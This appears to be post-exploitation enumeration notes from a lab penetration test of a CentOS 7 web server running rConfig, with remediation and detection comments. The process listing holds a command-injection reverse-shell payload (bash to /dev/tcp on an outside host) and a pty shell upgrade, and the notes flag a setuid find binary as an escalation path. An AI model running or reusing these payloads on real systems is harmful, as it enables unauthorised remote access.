System/Kernel
bash-4.2$ uname -a ; cat /etc/*release
Linux quackerjack 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
CentOS Linux release 7.8.2003 (Core)
NAME="CentOS Linux"
VERSION="7 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"
CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"
CentOS Linux release 7.8.2003 (Core)
CentOS Linux release 7.8.2003 (Core)
3.10.0-1127.10.1.el7.x86_64
x86_64
CentOS Linux 7 (Core)
Networks
bash-4.2$ ip route ; arp -a
default via 192.168.144.254 dev ens192
169.254.0.0/16 dev ens192 scope link metric 1003
192.168.144.0/24 dev ens192 proto kernel scope link src 192.168.144.57
gateway (192.168.144.254) at 00:50:56:9e:ad:80 [ether] on ens192
bash-4.2$ netstat -antup4
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp 0 17 192.168.144.57:48026 192.168.45.198:8081 ESTABLISHED 1852/bash
udp 0 0 127.0.0.1:323 0.0.0.0:* -
udp 0 0 0.0.0.0:901 0.0.0.0:* -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
Users & Groups
bash-4.2$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
total 4.0K
4.0K drwxr-xr-x. 15 apache root 4.0K Jul 9 2020 rconfig
0 dr-xr-xr-x. 17 root root 244 Jun 25 2020 ..
0 drwxr-xr-x. 3 root root 21 Jun 22 2020 .
rconfig
bash-4.2$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(bin) gid=1(bin) groups=1(bin)
uid=2(daemon) gid=2(daemon) groups=2(daemon)
uid=3(adm) gid=4(adm) groups=4(adm)
uid=4(lp) gid=7(lp) groups=7(lp)
uid=5(sync) gid=0(root) groups=0(root)
uid=6(shutdown) gid=0(root) groups=0(root)
uid=7(halt) gid=0(root) groups=0(root)
uid=8(mail) gid=12(mail) groups=12(mail)
uid=11(operator) gid=0(root) groups=0(root)
uid=12(games) gid=100(users) groups=100(users)
uid=14(ftp) gid=50(ftp) groups=50(ftp)
uid=99(nobody) gid=99(nobody) groups=99(nobody)
uid=192(systemd-network) gid=192(systemd-network) groups=192(systemd-network)
uid=81(dbus) gid=81(dbus) groups=81(dbus)
uid=999(polkitd) gid=998(polkitd) groups=998(polkitd)
uid=74(sshd) gid=74(sshd) groups=74(sshd)
uid=89(postfix) gid=89(postfix) groups=89(postfix),12(mail)
uid=998(chrony) gid=996(chrony) groups=996(chrony)
uid=48(apache) gid=48(apache) groups=48(apache)
uid=59(tss) gid=59(tss) groups=59(tss)
uid=32(rpc) gid=32(rpc) groups=32(rpc)
uid=27(mysql) gid=27(mysql) groups=27(mysql)
uid=48(apache) gid=48(apache) groups=48(apache)
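SUIDs
Note: /usr/bin/find is setuid root, which is not a stock permission for findutils on CentOS 7, so it is the misconfiguration to report from this list (remediation: chmod u-s /usr/bin/find, then check how the mode was changed). In the command below, `-ls` comes before `-type f`, so the type test does not filter what is printed; the SGID command further down uses the correct order.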
bash-4.2$ find / -perm -04000 -ls -type f 2>/dev/null | grep -v '/snap'
12596477 196 -rwsr-xr-x 1 root root 199304 Oct 30 2018 /usr/bin/find
12845841 76 -rwsr-xr-x 1 root root 73888 Aug 8 2019 /usr/bin/chage
12845842 80 -rwsr-xr-x 1 root root 78408 Aug 8 2019 /usr/bin/gpasswd
12897242 24 -rws--x--x 1 root root 23968 Apr 1 2020 /usr/bin/chfn
12897245 24 -rws--x--x 1 root root 23880 Apr 1 2020 /usr/bin/chsh
12845845 44 -rwsr-xr-x 1 root root 41936 Aug 8 2019 /usr/bin/newgrp
12897294 32 -rwsr-xr-x 1 root root 32128 Apr 1 2020 /usr/bin/su
13284201 144 ---s--x--x 1 root root 147336 Apr 1 2020 /usr/bin/sudo
12897278 44 -rwsr-xr-x 1 root root 44264 Apr 1 2020 /usr/bin/mount
12897298 32 -rwsr-xr-x 1 root root 31984 Apr 1 2020 /usr/bin/umount
12982629 60 -rwsr-xr-x 1 root root 57656 Aug 8 2019 /usr/bin/crontab
12944638 24 -rwsr-xr-x 1 root root 23576 Apr 1 2020 /usr/bin/pkexec
12862194 28 -rwsr-xr-x 1 root root 27856 Mar 31 2020 /usr/bin/passwd
13299021 32 -rwsr-xr-x 1 root root 32096 Oct 30 2018 /usr/bin/fusermount
354814 36 -rwsr-xr-x 1 root root 36272 Apr 1 2020 /usr/sbin/unix_chkpwd
354810 12 -rwsr-xr-x 1 root root 11232 Apr 1 2020 /usr/sbin/pam_timestamp_check
433482 12 -rwsr-xr-x 1 root root 11296 Mar 31 2020 /usr/sbin/usernetctl
4529180 16 -rwsr-xr-x 1 root root 15432 Apr 1 2020 /usr/lib/polkit-1/polkit-agent-helper-1
4528919 60 -rwsr-x--- 1 root dbus 58024 Mar 14 2019 /usr/libexec/dbus-1/dbus-daemon-launch-helper
12596477 196 -rwsr-xr-x 1 root root 199304 Oct 30 2018 /usr/bin/find
SGIDs
bash-4.2$ find / -type f -perm -02000 -ls 2>/dev/null | grep -v '/snap'
12610438 16 -r-xr-sr-x 1 root tty 15344 Jun 9 2014 /usr/bin/wall
12944466 20 -rwxr-sr-x 1 root tty 19544 Apr 1 2020 /usr/bin/write
13041865 376 ---x--s--x 1 root nobody 382216 Aug 8 2019 /usr/bin/ssh-agent
13031728 40 -rwx--s--x 1 root slocate 40520 Apr 10 2018 /usr/bin/locate
433477 12 -rwxr-sr-x 1 root root 11224 Mar 31 2020 /usr/sbin/netreport
484637 216 -rwxr-sr-x 1 root postdrop 218560 Apr 1 2020 /usr/sbin/postdrop
484740 260 -rwxr-sr-x 1 root postdrop 264128 Apr 1 2020 /usr/sbin/postqueue
8736345 12 -rwx--s--x 1 root utmp 11192 Jun 9 2014 /usr/libexec/utempter/utempter
4537792 456 ---x--s--x 1 root ssh_keys 465760 Aug 8 2019 /usr/libexec/openssh/ssh-keysign
Capabilities
bash-4.2$ getcap -r / 2>/dev/null
/usr/bin/newgidmap = cap_setgid+ep
/usr/bin/newuidmap = cap_setuid+ep
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
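Processes
Note: PIDs 1850-1852 are the current foothold. The `sh -c sudo -u apache zip ...` command line appears to have been built by concatenating an unquoted path value into a shell string, so the backtick substitution ran as apache. PID 1852 is the same bash that holds the ESTABLISHED connection to 192.168.45.198:8081 in the netstat output above. For detection, an httpd child spawning sh/bash with a /dev/tcp redirection is the signal to alert on; auditd is running on this host.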
bash-4.2$ ps -auxwww
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.3 125472 3908 ? Ss 01:18 0:00 /usr/lib/systemd/systemd --switched-root --system --deserialize 22
root 574 0.0 0.1 37236 1868 ? Ss 01:18 0:00 /usr/lib/systemd/systemd-journald
root 592 0.0 0.1 190376 1340 ? Ss 01:18 0:00 /usr/sbin/lvmetad -f
root 599 0.0 0.2 45640 2552 ? Ss 01:18 0:00 /usr/lib/systemd/systemd-udevd
root 703 0.0 0.0 55532 848 ? S<sl 01:18 0:00 /sbin/auditd
root 732 0.0 0.6 99688 6196 ? Ss 01:18 0:00 /usr/bin/VGAuthService -s
polkitd 733 0.0 1.0 612248 11108 ? Ssl 01:18 0:00 /usr/lib/polkit-1/polkitd --no-debug
rpc 737 0.0 0.0 69280 1008 ? Ss 01:18 0:00 /sbin/rpcbind -w
root 738 0.0 0.7 314456 7288 ? Ssl 01:18 0:01 /usr/bin/vmtoolsd
root 739 0.0 0.1 26384 1752 ? Ss 01:18 0:00 /usr/lib/systemd/systemd-logind
dbus 740 0.0 0.2 58240 2464 ? Ss 01:18 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
chrony 749 0.0 0.1 117808 1644 ? S 01:18 0:00 /usr/sbin/chronyd
root 761 0.0 0.1 126388 1580 ? Ss 01:18 0:00 /usr/sbin/crond -n
root 769 0.0 0.0 110204 848 tty1 Ss+ 01:18 0:00 /sbin/agetty --noclear tty1 linux
root 783 0.0 1.0 550284 10972 ? Ssl 01:18 0:00 /usr/sbin/NetworkManager --no-daemon
root 1014 0.0 1.7 574300 17456 ? Ssl 01:19 0:00 /usr/bin/python2 -Es /usr/sbin/tuned -l -P
root 1017 0.0 0.3 227260 3516 ? Ssl 01:19 0:00 /usr/sbin/rsyslogd -n
root 1021 0.0 1.6 407936 16420 ? Ss 01:19 0:00 /usr/sbin/httpd -DFOREGROUND
root 1023 0.0 0.4 112924 4308 ? Ss 01:19 0:00 /usr/sbin/sshd -D
root 1028 0.0 0.0 53288 576 ? Ss 01:19 0:00 /usr/sbin/vsftpd /etc/vsftpd/vsftpd.conf
mysql 1064 0.0 0.1 113412 1600 ? Ss 01:19 0:00 /bin/sh /usr/bin/mysqld_safe --basedir=/usr
mysql 1232 0.0 9.1 1169336 92912 ? Sl 01:19 0:00 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib64/mysql/plugin --log-error=/var/log/mariadb/mariadb.log --pid-file=/var/run/mariadb/mariadb.pid --socket=/var/lib/mysql/mysql.sock
apache 1236 0.0 1.2 409076 12828 ? S 01:19 0:00 /usr/sbin/httpd -DFOREGROUND
apache 1237 0.0 1.2 408972 12724 ? S 01:19 0:00 /usr/sbin/httpd -DFOREGROUND
apache 1238 0.0 1.1 408564 11804 ? S 01:19 0:00 /usr/sbin/httpd -DFOREGROUND
apache 1239 0.0 1.2 409084 12788 ? S 01:19 0:00 /usr/sbin/httpd -DFOREGROUND
apache 1240 0.0 1.2 409076 12800 ? S 01:19 0:00 /usr/sbin/httpd -DFOREGROUND
root 1449 0.0 1.2 454168 12784 ? Ss 01:20 0:00 /usr/sbin/smbd --foreground --no-process-group
root 1451 0.0 0.3 450216 3896 ? S 01:20 0:00 /usr/sbin/smbd --foreground --no-process-group
root 1452 0.0 0.3 450208 3612 ? S 01:20 0:00 /usr/sbin/smbd --foreground --no-process-group
root 1454 0.0 0.4 454168 4100 ? S 01:20 0:00 /usr/sbin/smbd --foreground --no-process-group
root 1506 0.0 0.0 123360 732 ? Ss 01:30 0:00 /usr/sbin/anacron -s
apache 1737 0.0 1.2 408972 12700 ? S 01:49 0:00 /usr/sbin/httpd -DFOREGROUND
apache 1749 0.0 1.1 408204 11516 ? S 01:54 0:00 /usr/sbin/httpd -DFOREGROUND
apache 1831 0.0 0.7 408072 7828 ? S 02:08 0:00 /usr/sbin/httpd -DFOREGROUND
apache 1850 0.0 0.1 11688 1140 ? S 02:08 0:00 sh -c sudo -u apache zip -r -j `bash -i>& /dev/tcp/192.168.45.198/8081 0>&1`archive/filename20250403.zip `bash -i>& /dev/tcp/192.168.45.198/8081 0>&1`*.random
apache 1851 0.0 0.0 11688 652 ? S 02:08 0:00 sh -c sudo -u apache zip -r -j `bash -i>& /dev/tcp/192.168.45.198/8081 0>&1`archive/filename20250403.zip `bash -i>& /dev/tcp/192.168.45.198/8081 0>&1`*.random
apache 1852 0.0 0.1 11828 1772 ? S 02:08 0:00 bash -i
apache 1859 0.0 0.4 26032 4732 ? S 02:09 0:00 python -c import pty; pty.spawn("/bin/bash")
apache 1860 0.0 0.1 11824 1812 pts/0 Ss 02:09 0:00 /bin/bash
apache 1970 0.0 0.1 51756 1736 pts/0 R+ 02:13 0:00 ps -auxwww
polkitd 733 0.0 1.0 612248 11108 ? Ssl 01:18 0:00 /usr/lib/polkit-1/polkitd --no-debug
rpc 737 0.0 0.0 69280 1008 ? Ss 01:18 0:00 /sbin/rpcbind -w
root 761 0.0 0.1 126388 1580 ? Ss 01:18 0:00 /usr/sbin/crond -n
root 1021 0.0 1.6 407936 16420 ? Ss 01:19 0:00 /usr/sbin/httpd -DFOREGROUND
root 1028 0.0 0.0 53288 576 ? Ss 01:19 0:00 /usr/sbin/vsftpd /etc/vsftpd/vsftpd.conf
mysql 1064 0.0 0.1 113412 1600 ? Ss 01:19 0:00 /bin/sh /usr/bin/mysqld_safe --basedir=/usr
mysql 1232 0.0 9.1 1169336 92912 ? Sl 01:19 0:00 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib64/mysql/plugin --log-error=/var/log/mariadb/mariadb.log --pid-file=/var/run/mariadb/mariadb.pid --socket=/var/lib/mysql/mysql.sock
Cron & Systemd
bash-4.2$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for apache
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
NEXT LEFT LAST PASSED
Fri 2025-04-04 01:33:54 EDT 23h left Thu 2025-01-30 03:04:06 EST 2 months 2 da
1 timers listed.
Pass --all to see loaded but inactive timers, too.
Services
bash-4.2$ systemctl list-units --state=running
UNIT LOAD ACTIVE SUB DESCRIPTION
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable Fil
auditd.service loaded active running Security Auditing Service
chronyd.service loaded active running NTP client/server
crond.service loaded active running Command Scheduler
dbus.service loaded active running D-Bus System Message Bus
getty@tty1.service loaded active running Getty on tty1
httpd.service loaded active running The Apache HTTP Server
lvm2-lvmetad.service loaded active running LVM2 metadata daemon
mariadb.service loaded active running MariaDB database server
NetworkManager.service loaded active running Network Manager
polkit.service loaded active running Authorization Manager
rpcbind.service loaded active running RPC bind service
rsyslog.service loaded active running System Logging Service
smb.service loaded active running Samba SMB Daemon
sshd.service loaded active running OpenSSH server daemon
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running Login Service
systemd-udevd.service loaded active running udev Kernel Device Manager
tuned.service loaded active running Dynamic System Tuning Daemon
vgauthd.service loaded active running VGAuth Service for open-vm-to
vmtoolsd.service loaded active running Service for virtual machines
vsftpd.service loaded active running Vsftpd ftp daemon
dbus.socket loaded active running D-Bus System Message Bus Sock
lvm2-lvmetad.socket loaded active running LVM2 metadata daemon socket
rpcbind.socket loaded active running RPCbind Server Activation Soc
systemd-journald.socket loaded active running Journal Socket
systemd-udevd-control.socket loaded active running udev Control Socket
systemd-udevd-kernel.socket loaded active running udev Kernel Socket
LOAD = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB = The low-level unit activation state, values depend on unit type.
28 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.
httpd.service
Sudo Version
bash-4.2$ sudo --version
Sudo version 1.8.23
Sudoers policy plugin version 1.8.23
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.23
Sudo version 1.8.23
Glibc Version
bash-4.2$ ldd --version
ldd (GNU libc) 2.17
Copyright (C) 2012 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
ldd (GNU libc) 2.17